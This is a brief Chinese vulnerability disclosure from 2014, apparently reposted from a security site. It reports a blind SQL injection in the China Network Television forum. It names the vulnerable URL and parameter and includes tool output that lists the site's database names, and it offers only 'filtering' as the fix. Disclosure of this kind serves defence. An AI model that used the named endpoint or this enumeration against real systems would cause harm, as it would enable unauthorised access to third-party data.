中国网络电视台存在严重sql注射下载
-
来源:黑吧安全网 浏览:603次 时间:2014-06-12
中国网络电视台存在严重sql注入漏洞,
官网论坛存在sql盲注~~这个太致命了
http://bbs.cntv.cn
漏洞链接:
http://bbs.cntv.cn/cctvapi/Comment/english.php?id=数据库:
available databases [14]:
[*] bak
[*] cctv_0922
[*] cctv_1012
[*] cctv_1101
[*] cctv_2010
[*] cntv_bbs
[*] cntv_bbs_3
[*] cntv_bbs_tmp
[*] discuz
[*] information_scoema
[*] mysql
[*] qr_admin
[*] test
[*] vote
当前库:cntv_bbs
由于盲注,工具没跑出表,手工太麻烦了,而且只是检测,所以就点到为止!
修复方案:
过滤
下一篇: 中国网络电视台某分站修复不当再次注入下载